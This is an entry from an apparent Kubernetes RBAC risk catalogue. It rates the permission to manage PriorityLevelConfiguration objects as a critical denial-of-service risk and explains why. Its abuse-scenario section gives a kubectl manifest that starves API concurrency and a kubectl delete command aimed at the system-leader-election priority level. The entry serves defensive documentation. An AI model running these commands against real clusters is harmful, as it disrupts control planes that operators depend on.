Manage PriorityLevelConfigurations (API Server DoS/Manipulation)
Denial of Service
Critical
Overview
| Field | Value |
|---|---|
| ID | 1099 |
| Name | Manage PriorityLevelConfigurations (API Server DoS/Manipulation) |
| Risk Category | Denial of Service |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | flowcontrol.apiserver.k8s.io |
| Resources | prioritylevelconfigurations |
| Verbs | create, update, patch, delete |
| Tags | APIServerDoS ControlPlaneDisruption DenialOfService Tampering |
Description
Allows managing PriorityLevelConfiguration objects cluster-wide. These are part of API Priority and Fairness, defining concurrency limits and queueing for API requests. Misconfiguration can lead to denial of service against the API server by starving critical requests or by setting unfair limits, impacting cluster stability.
Abuse Scenarios
- Create a new PriorityLevelConfiguration with extremely low concurrency limits (DoS).
kubectl create -f - <<EOF
apiVersion: flowcontrol.apiserver.k8s.io/v1beta2
kind: PriorityLevelConfiguration
metadata:
name: starve-api
spec:
type: Limited
limited:
assuredConcurrencyShares: 1
limitResponse:
type: Reject
EOF
# Example: kubectl create -f - <<EOF ... EOF
- Delete an existing PriorityLevelConfiguration, disrupting API server stability.
kubectl delete prioritylevelconfiguration <prioritylevelconfiguration-name>
# Example: kubectl delete prioritylevelconfiguration system-leader-election